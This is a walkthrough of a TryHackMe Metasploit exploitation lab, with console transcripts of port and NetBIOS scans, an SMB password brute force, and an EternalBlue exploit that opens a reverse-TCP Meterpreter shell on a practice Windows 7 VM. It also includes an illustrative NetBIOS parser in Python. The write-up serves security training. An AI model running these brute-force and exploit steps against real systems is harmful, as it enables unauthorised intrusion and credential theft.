
Metasploit - Exploitation

THM Room https://tryhackme.com/room/metasploitexploitation

TASK 1 : Introduction

Start the AttackBox and run Metasploit using the msfconsole command to follow along this room.

No Answer

TASK 2 : Scanning

How many ports are open on the target system?

root@ip-10-10-196-135:~/Desktop/msexploit# msfconsole
[...]

msf5 > search portscan

Matching Modules
================

   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/http/wordpress_pingback_access                   normal  No     Wordpress Pingback Locator
   1  auxiliary/scanner/natpmp/natpmp_portscan                           normal  No     NAT-PMP External Port Scanner
   2  auxiliary/scanner/portscan/ack                                     normal  No     TCP ACK Firewall Scanner
   3  auxiliary/scanner/portscan/ftpbounce                               normal  No     FTP Bounce Port Scanner
   4  auxiliary/scanner/portscan/syn                                     normal  No     TCP SYN Port Scanner
   5  auxiliary/scanner/portscan/tcp                                     normal  No     TCP Port Scanner
   6  auxiliary/scanner/portscan/xmas                                    normal  No     TCP "XMas" Port Scanner
   7  auxiliary/scanner/sap/sap_router_portscanner                       normal  No     SAPRouter Port Scanner


Interact with a module by name or index, for example use 7 or use auxiliary/scanner/sap/sap_router_portscanner

msf5 > use 5
msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 10.10.33.77
RHOSTS => 10.10.33.77
msf5 auxiliary(scanner/portscan/tcp) > run

[+] 10.10.33.77:          - 10.10.33.77:21 - TCP OPEN
[+] 10.10.33.77:          - 10.10.33.77:22 - TCP OPEN
[+] 10.10.33.77:          - 10.10.33.77:139 - TCP OPEN
[+] 10.10.33.77:          - 10.10.33.77:445 - TCP OPEN
[+] 10.10.33.77:          - 10.10.33.77:8000 - TCP OPEN
[*] 10.10.33.77:          - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

We found 5 open TCP ports. Answer : 5

Using the relevant scanner, what NetBIOS name can you see?

msf5 auxiliary(scanner/portscan/tcp) > back
msf5 > search netbios

Matching Modules
================

   #  Name                                          Disclosure Date  Rank    Check  Description
   -  ----                                          ---------------  ----    -----  -----------
   0  auxiliary/admin/netbios/netbios_spoof                          normal  No     NetBIOS Response Brute Force Spoof (Direct)
   1  auxiliary/dos/smb/smb_loris                   2017-06-29       normal  No     SMBLoris NBSS Denial of Service
   2  auxiliary/scanner/http/ntlm_info_enumeration                   normal  No     Host Information Enumeration via NTLM Authentication
   3  auxiliary/scanner/netbios/nbname                               normal  No     NetBIOS Information Discovery
   4  auxiliary/server/netbios_spoof_nat            2016-06-14       normal  No     NetBIOS Response "BadTunnel" Brute Force Spoof (NAT Tunnel)
   5  auxiliary/server/wpad                                          normal  No     WPAD.dat File Server
   6  auxiliary/spoof/llmnr/llmnr_response                           normal  No     LLMNR Spoofer
   7  auxiliary/spoof/nbns/nbns_response                             normal  No     NetBIOS Name Service Spoofer


Interact with a module by name or index, for example use 7 or use auxiliary/spoof/nbns/nbns_response

msf5 > use 3
msf5 auxiliary(scanner/netbios/nbname) > show options

Module options (auxiliary/scanner/netbios/nbname):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to probe in each set
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      137              yes       The target port (UDP)
   THREADS    10               yes       The number of concurrent threads

msf5 auxiliary(scanner/netbios/nbname) > set RHOSTS 10.10.33.77
RHOSTS => 10.10.33.77
msf5 auxiliary(scanner/netbios/nbname) > run

[*] Sending NetBIOS requests to 10.10.33.77->10.10.33.77 (1 hosts)
[+] 10.10.33.77 [IP-10-10-33-77] OS:Unix Names:(IP-10-10-33-77, __MSBROWSE__, ACME IT SUPPORT) Addresses:(10.10.33.77) Mac:00:00:00:00:00:00 
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Answer : ACME IT SUPPORT
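The nbname module gets that workgroup name by sending a NetBIOS node status (NBSTAT) query to UDP/137 and reading the name table in the reply. As an added illustration, not part of the original write-up or of Metasploit's own code, the Python below builds that query, parses a node status response and picks out the workgroup and computer names; the reply it parses is a constructed packet mirroring the names printed above, not a capture from the target.

```python
import struct

NBSTAT = 0x0021                        # RR type of a NetBIOS node status request/response
NB_CLASS_IN = 0x0001
WILDCARD_NAME = b"*" + b"\x00" * 15    # the "*" name used for node status queries


def encode_nb_name(raw16: bytes) -> bytes:
    """First-level encode a 16-byte NetBIOS name (RFC 1001 14.1): each nibble + 'A'."""
    assert len(raw16) == 16
    enc = b"".join(bytes([(b >> 4) + 0x41, (b & 0x0F) + 0x41]) for b in raw16)
    return b"\x20" + enc + b"\x00"     # one 32-byte label, then the root label


def build_node_status_query(txid: int) -> bytes:
    """The UDP/137 datagram a node status scanner sends: one NBSTAT question for '*'."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)   # QDCOUNT=1
    question = encode_nb_name(WILDCARD_NAME) + struct.pack("!HH", NBSTAT, NB_CLASS_IN)
    return header + question


def build_node_status_response(txid: int, entries, mac: bytes) -> bytes:
    """Constructed responder reply. entries: list of (name, suffix, NAME_FLAGS)."""
    names = b"".join(
        name.encode("latin-1").ljust(15, b" ")[:15] + bytes([suffix]) + struct.pack("!H", flags)
        for name, suffix, flags in entries
    )
    statistics = mac + b"\x00" * 40    # UNIT_ID (MAC address) followed by zeroed counters
    rdata = bytes([len(entries)]) + names + statistics
    header = struct.pack("!HHHHHH", txid, 0x8400, 0, 1, 0, 0)   # QR=1, AA=1, ANCOUNT=1
    rr = encode_nb_name(WILDCARD_NAME) + struct.pack("!HHIH", NBSTAT, NB_CLASS_IN, 0, len(rdata))
    return header + rr + rdata


def parse_node_status_response(pkt: bytes) -> dict:
    """Decode the name table and MAC from a node status response."""
    txid, flags, _qd, an, _ns, _ar = struct.unpack("!HHHHHH", pkt[:12])
    if not flags & 0x8000 or an != 1:
        raise ValueError("not a node status response")
    off = 12
    while pkt[off] != 0:               # skip the RR_NAME labels
        off += 1 + pkt[off]
    off += 1
    rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
    off += 10
    if rtype != NBSTAT:
        raise ValueError("unexpected RR type 0x%04x" % rtype)
    rdata = pkt[off:off + rdlen]
    num_names = rdata[0]
    names, p = [], 1
    for _ in range(num_names):         # 18-byte NODE_NAME entries
        raw = rdata[p:p + 15]
        suffix = rdata[p + 15]
        nflags = struct.unpack("!H", rdata[p + 16:p + 18])[0]
        p += 18
        # Browser names carry control bytes (e.g. \x01\x02__MSBROWSE__\x02); keep the printable part
        text = "".join(ch for ch in raw.decode("latin-1") if ch.isprintable()).strip()
        names.append({"name": text, "suffix": suffix,
                      "group": bool(nflags & 0x8000),    # G bit: group (workgroup/domain) name
                      "active": bool(nflags & 0x0400)})  # ACT bit
    mac = rdata[p:p + 6]
    return {"txid": txid, "names": names, "mac": ":".join("%02x" % b for b in mac)}


def workgroup_names(parsed: dict) -> list:
    """Group names with suffix <00> are the workgroup/domain names."""
    seen = []
    for n in parsed["names"]:
        if n["group"] and n["suffix"] == 0x00 and n["name"] not in seen:
            seen.append(n["name"])
    return seen


def host_names(parsed: dict) -> list:
    """Unique names with suffix <00> are the computer names."""
    seen = []
    for n in parsed["names"]:
        if not n["group"] and n["suffix"] == 0x00 and n["name"] not in seen:
            seen.append(n["name"])
    return seen


# Constructed sample reply mirroring the names the nbname module printed above.
SAMPLE_ENTRIES = [
    ("IP-10-10-33-77", 0x00, 0x0400),              # unique, active: computer name
    ("IP-10-10-33-77", 0x20, 0x0400),              # file server service
    ("\x01\x02__MSBROWSE__\x02", 0x01, 0x8400),    # master browser group name
    ("ACME IT SUPPORT", 0x00, 0x8400),             # group, active: workgroup name
    ("ACME IT SUPPORT", 0x1e, 0x8400),             # browser election group
]
SAMPLE_RESPONSE = build_node_status_response(0x1234, SAMPLE_ENTRIES, b"\x00" * 6)

if __name__ == "__main__":
    parsed = parse_node_status_response(SAMPLE_RESPONSE)
    for n in parsed["names"]:
        print("%-16s <%02x> %s" % (n["name"], n["suffix"], "GROUP" if n["group"] else "UNIQUE"))
    print("workgroup:", workgroup_names(parsed), "mac:", parsed["mac"])
```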

What is running on port 8000?

To answer this question, I ran nmap to identify the service running on port 8000, then used the module scanner/http_version :

msf5 auxiliary(scanner/netbios/nbname) > back
msf5 > nmap -sS 10.10.33.77
[*] exec: nmap -sS 10.10.33.77


Starting Nmap 7.60 ( https://nmap.org ) at 2021-09-26 08:39 BST
Nmap scan report for ip-10-10-33-77.eu-west-1.compute.internal (10.10.33.77)
Host is up (0.0014s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
8000/tcp open  http-alt
MAC Address: 02:E9:BA:38:47:59 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.70 seconds
msf5 > search http_version

Matching Modules
================

   #  Name                                 Disclosure Date  Rank    Check  Description
   -  ----                                 ---------------  ----    -----  -----------
   0  auxiliary/scanner/http/http_version                   normal  No     HTTP Version Detection

msf5 > use 0
msf5 auxiliary(scanner/http/http_version) > show options

Module options (auxiliary/scanner/http/http_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   THREADS  1                yes       The number of concurrent threads (max one per host)
   VHOST                     no        HTTP server virtual host

msf5 auxiliary(scanner/http/http_version) > setg RHOSTS 10.10.33.77
RHOSTS => 10.10.33.77
msf5 auxiliary(scanner/http/http_version) > set RPORT 8000
RPORT => 8000
msf5 auxiliary(scanner/http/http_version) > run

[+] 10.10.33.77:8000 webfs/1.21 ( 403-Forbidden )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Answer : webfs/1.21

What is the “penny” user’s SMB password? Use the wordlist mentioned in the previous task.

msf5 auxiliary(scanner/http/http_version) > back
msf5 > search scanner/smb

Matching Modules
================

   #   Name                                         Disclosure Date  Rank    Check  Description
   -   ----                                         ---------------  ----    -----  -----------
   0   auxiliary/scanner/smb/impacket/dcomexec      2018-03-19       normal  No     DCOM Exec
   1   auxiliary/scanner/smb/impacket/secretsdump                    normal  No     DCOM Exec
   2   auxiliary/scanner/smb/impacket/wmiexec       2018-03-19       normal  No     WMI Exec
   3   auxiliary/scanner/smb/pipe_auditor                            normal  No     SMB Session Pipe Auditor
   4   auxiliary/scanner/smb/pipe_dcerpc_auditor                     normal  No     SMB Session Pipe DCERPC Auditor
   5   auxiliary/scanner/smb/psexec_loggedin_users                   normal  No     Microsoft Windows Authenticated Logged In Users Enumeration
   6   auxiliary/scanner/smb/smb1                                    normal  No     SMBv1 Protocol Detection
   7   auxiliary/scanner/smb/smb2                                    normal  No     SMB 2.0 Protocol Detection
   8   auxiliary/scanner/smb/smb_enum_gpp                            normal  No     SMB Group Policy Preference Saved Passwords Enumeration
   9   auxiliary/scanner/smb/smb_enumshares                          normal  No     SMB Share Enumeration
   10  auxiliary/scanner/smb/smb_enumusers                           normal  No     SMB User Enumeration (SAM EnumUsers)
   11  auxiliary/scanner/smb/smb_enumusers_domain                    normal  No     SMB Domain User Enumeration
   12  auxiliary/scanner/smb/smb_login                               normal  No     SMB Login Check Scanner
   13  auxiliary/scanner/smb/smb_lookupsid                           normal  No     SMB SID User Enumeration (LookupSid)
   14  auxiliary/scanner/smb/smb_ms17_010                            normal  No     MS17-010 SMB RCE Detection
   15  auxiliary/scanner/smb/smb_uninit_cred                         normal  Yes    Samba _netr_ServerPasswordSet Uninitialized Credential State
   16  auxiliary/scanner/smb/smb_version                             normal  No     SMB Version Detection


Interact with a module by name or index, for example use 16 or use auxiliary/scanner/smb/smb_version

msf5 > use 12
msf5 auxiliary(scanner/smb/smb_login) > show options

Module options (auxiliary/scanner/smb/smb_login):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   ABORT_ON_LOCKOUT   false            yes       Abort the run when an account lockout is detected
   BLANK_PASSWORDS    false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED   5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS       false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS        false            no        Add all passwords in the current database to the list
   DB_ALL_USERS       false            no        Add all users in the current database to the list
   DETECT_ANY_AUTH    false            no        Enable detection of systems accepting any authentication
   DETECT_ANY_DOMAIN  false            no        Detect if domain is required for the specified user
   PASS_FILE                           no        File containing passwords, one per line
   PRESERVE_DOMAINS   true             no        Respect a username that contains a domain name.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RECORD_GUEST       false            no        Record guest-privileged random logins to the database
   RHOSTS             10.10.33.77      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT              445              yes       The SMB service port (TCP)
   SMBDomain          .                no        The Windows domain to use for authentication
   SMBPass                             no        The password for the specified username
   SMBUser                             no        The username to authenticate as
   STOP_ON_SUCCESS    false            yes       Stop guessing when a credential works for a host
   THREADS            1                yes       The number of concurrent threads (max one per host)
   USERPASS_FILE                       no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS       false            no        Try the username as the password for all users
   USER_FILE                           no        File containing usernames, one per line
   VERBOSE            true             yes       Whether to print output for all attempts

msf5 auxiliary(scanner/smb/smb_login) > set SMBUser penny
SMBUser => penny
msf5 auxiliary(scanner/smb/smb_login) > ls
[*] exec: ls

MetasploitWordlist.txt
msf5 auxiliary(scanner/smb/smb_login) > set DB_ALL_PASS true
DB_ALL_PASS => true
msf5 auxiliary(scanner/smb/smb_login) > set PASS_FILE MetasploitWordlist.txt
PASS_FILE => MetasploitWordlist.txt
msf5 auxiliary(scanner/smb/smb_login) > run

[*] 10.10.33.77:445       - 10.10.33.77:445 - Starting SMB login bruteforce
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:95',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:98',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:2003',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:2008',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:111111',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:123456',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:12345678',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:1qaz2wsx',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:abc',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:abc123',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:abcd123',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:account',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:admin',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:adminadmin',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:administator',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:admins',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:air',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:alpine',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:Autumn2013',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:autumn2013',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:Autumn2014',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:autumn2014',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:Autumn2015',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:autumn2015',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:Autumn2016',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:autumn2016',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:Autumn2017',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:autumn2017',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:bankbank',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:baseball',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:basketball',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:bird',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:burp',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:change',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:changelater',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:changeme',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:company',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:company!',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:company1',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:company1!',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:company123',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:complex',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:complex1',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:complex2',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:complex3',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:complexpassword',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:database',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:default',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:dev',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:devdev',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:devdevdev',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:dirt',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:dragon',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:earth',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:fire',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:football',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:goat',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:goat',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:god',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:guessme',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:hugs',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:letmein',
[+] 10.10.33.77:445       - 10.10.33.77:445 - Success: '.\penny:leo1234'
[*] 10.10.33.77:445       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Answer : leo1234

TASK 3 : The Metasploit Database

No answers needed.

No Answer

TASK 4 : Vulnerability Scanning

Who wrote the module that allows us to check SMTP servers for open relay?

Let’s again search for keywords like SMTP, smtp_server and relay. The last one gives me what I want :

msf5 > search relay

Matching Modules
================

   #   Name                                                            Disclosure Date  Rank       Check  Description
   -   ----                                                            ---------------  ----       -----  -----------
   0   auxiliary/admin/mssql/mssql_ntlm_stealer                                         normal     No     Microsoft SQL Server NTLM Stealer
   1   auxiliary/admin/mssql/mssql_ntlm_stealer_sqli                                    normal     No     Microsoft SQL Server SQLi NTLM Stealer
   2   auxiliary/admin/oracle/ora_ntlm_stealer                         2009-04-07       normal     No     Oracle SMB Relay Code Execution
   3   auxiliary/gather/ibm_bigfix_sites_packages_enum                 2019-03-18       normal     No     IBM BigFix Relay Server Sites and Package Enum
   4   auxiliary/scanner/http/exchange_web_server_pushsubscription     2019-01-21       normal     No     Microsoft Exchange Privilege Escalation Exploit
   5   auxiliary/scanner/sap/sap_smb_relay                                              normal     No     SAP SMB Relay Abuse
   6   auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence                   normal     No     SAP SOAP RFC PFL_CHECK_OS_FILE_EXISTENCE File Existence Check
   7   auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir                                  normal     No     SAP SOAP RFC RZL_READ_DIR_LOCAL Directory Contents Listing
   8   auxiliary/scanner/smtp/smtp_relay                                                normal     No     SMTP Open Relay Detection
   9   auxiliary/server/http_ntlmrelay                                                  normal     No     HTTP Client MS Credential Relayer
   10  auxiliary/server/socks4a                                                         normal     No     Socks4a Proxy Server
   11  auxiliary/server/socks5                                                          normal     No     Socks5 Proxy Server
   12  exploit/multi/http/october_upload_bypass_exec                   2017-04-25       excellent  Yes    October CMS Upload Protection Bypass Code Execution
   13  exploit/multi/http/vtiger_logo_upload_exec                      2015-09-28       excellent  Yes    Vtiger CRM - Authenticated Logo Upload RCE
   14  exploit/windows/browser/ms13_009_ie_slayoutrun_uaf              2013-02-13       average    No     MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free
   15  exploit/windows/smb/smb_relay                                   2001-03-31       excellent  No     MS08-068 Microsoft Windows SMB Relay Code Execution
   16  post/multi/manage/screenshare                                                    normal     No     Multi Manage the screen of the target meterpreter session


Interact with a module by name or index, for example use 16 or use post/multi/manage/screenshare

msf5 > use 8
msf5 auxiliary(scanner/smtp/smtp_relay) > info

       Name: SMTP Open Relay Detection
     Module: auxiliary/scanner/smtp/smtp_relay
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Campbell Murray
  xistence <xistence@0x90.nl>

Check supported:
  No

Basic options:
  Name      Current Setting     Required  Description
  ----      ---------------     --------  -----------
  EXTENDED  false               yes       Do all the 16 extended checks
  MAILFROM  sender@example.com  yes       FROM address of the e-mail
  MAILTO    target@example.com  yes       TO address of the e-mail
  RHOSTS    10.10.33.77         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT     25                  yes       The target port (TCP)
  THREADS   1                   yes       The number of concurrent threads (max one per host)

Description:
  This module tests if an SMTP server will accept (via a code 250) an 
  e-mail by using a variation of testing methods. Some of the extended 
  methods will try to abuse configuration or mailserver flaws.

References:
  http://www.ietf.org/rfc/rfc2821.txt
  https://svn.nmap.org/nmap/scripts/smtp-open-relay.nse

Answer : Campbell Murray

TASK 5 : Exploitation

Exploit one of the critical vulnerabilities on the target VM.

msf5 > setg RHOSTS 10.10.215.124
RHOSTS => 10.10.215.124
msf5 > search eternalblue

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index, for example use 4 or use exploit/windows/smb/smb_doublepulsar_rce

msf5 > use 2
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.10.196.135:4444 
[*] 10.10.215.124:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.215.124:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.215.124:445     - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.215.124:445 - Connecting to target for exploitation.
[+] 10.10.215.124:445 - Connection established for exploitation.
[+] 10.10.215.124:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.215.124:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.215.124:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.215.124:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.215.124:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.215.124:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.215.124:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.215.124:445 - Sending all but last fragment of exploit packet
[*] 10.10.215.124:445 - Starting non-paged pool grooming
[+] 10.10.215.124:445 - Sending SMBv2 buffers
[+] 10.10.215.124:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.215.124:445 - Sending final SMBv2 buffers.
[*] 10.10.215.124:445 - Sending last fragment of exploit packet!
[*] 10.10.215.124:445 - Receiving response from exploit packet
[+] 10.10.215.124:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.215.124:445 - Sending egg to corrupted connection.
[*] 10.10.215.124:445 - Triggering free of corrupted buffer.
[*] Sending stage (201283 bytes) to 10.10.215.124
[*] Meterpreter session 2 opened (10.10.196.135:4444 -> 10.10.215.124:49189) at 2021-09-26 09:39:36 +0100
[+] 10.10.215.124:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.215.124:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.215.124:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >

No Answer

What is the content of the flag.txt file?

meterpreter > shell
C:\Windows\system32>cd /Users
cd /Users

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E611-0B66

 Directory of C:\Users

12/12/2018  10:13 PM    <DIR>          .
12/12/2018  10:13 PM    <DIR>          ..
12/12/2018  10:13 PM    <DIR>          Jon
04/12/2011  03:28 AM    <DIR>          Public
               0 File(s)              0 bytes
               4 Dir(s)  39,938,625,536 bytes free

C:\Users>cd Jon/Desktop
cd Jon

C:\Users\Jon\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E611-0B66

 Directory of C:\Users\Jon\Desktop

12/12/2018  10:49 PM    <DIR>          .
12/12/2018  10:49 PM    <DIR>          ..
               0 File(s)              0 bytes
               2 Dir(s)  39,938,625,536 bytes free

C:\Users\Jon\Desktop>cd ..
cd ..

C:\Users\Jon>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E611-0B66

 Directory of C:\Users\Jon

12/12/2018  10:13 PM    <DIR>          .
12/12/2018  10:13 PM    <DIR>          ..
12/12/2018  10:13 PM    <DIR>          Contacts
12/12/2018  10:49 PM    <DIR>          Desktop
07/14/2021  09:39 PM    <DIR>          Documents
12/12/2018  10:13 PM    <DIR>          Downloads
12/12/2018  10:13 PM    <DIR>          Favorites
12/12/2018  10:13 PM    <DIR>          Links
12/12/2018  10:13 PM    <DIR>          Music
12/12/2018  10:13 PM    <DIR>          Pictures
12/12/2018  10:13 PM    <DIR>          Saved Games
12/12/2018  10:13 PM    <DIR>          Searches
12/12/2018  10:13 PM    <DIR>          Videos
               0 File(s)              0 bytes
              13 Dir(s)  39,938,625,536 bytes free

C:\Users\Jon>cd Documents
cd Documents

C:\Users\Jon\Documents>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E611-0B66

 Directory of C:\Users\Jon\Documents

07/14/2021  09:39 PM    <DIR>          .
07/14/2021  09:39 PM    <DIR>          ..
07/14/2021  09:39 PM                15 flag.txt
               1 File(s)             15 bytes
               2 Dir(s)  39,938,625,536 bytes free

C:\Users\Jon\Documents>type flag.txt
type flag.txt
THM-5455554845

You can also use the search command in meterpreter :


meterpreter > search -f "flag.txt"
Found 1 result...
    c:\Users\Jon\Documents\flag.txt (15 bytes)

Answer : THM-5455554845

What is the NTLM hash of the password of the user “pirate”?

We need to dump the hash of a user. For this, I’ll background my meterpreter session, then search for a hashdump module in Metasploit :

C:\Windows\system32>exit
exit
meterpreter > 
Background session 2? [y/N]  
msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions

Active sessions
===============

  Id  Name  Type                     Information                   Connection
  --  ----  ----                     -----------                   ----------
  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ JON-PC  10.10.196.135:4444 -> 10.10.215.124:49189 (10.10.215.124)

msf5 exploit(windows/smb/ms17_010_eternalblue) > back
msf5 > search hashdump

Matching Modules
================

   #   Name                                                  Disclosure Date  Rank    Check  Description
   -   ----                                                  ---------------  ----    -----  -----------
   0   auxiliary/analyze/crack_databases                                      normal  No     Password Cracker: Databases
   1   auxiliary/scanner/mssql/mssql_hashdump                                 normal  No     MSSQL Password Hashdump
   2   auxiliary/scanner/mysql/mysql_authbypass_hashdump     2012-06-09       normal  No     MySQL Authentication Bypass Password Dump
   3   auxiliary/scanner/mysql/mysql_hashdump                                 normal  No     MYSQL Password Hashdump
   4   auxiliary/scanner/oracle/oracle_hashdump                               normal  No     Oracle Password Hashdump
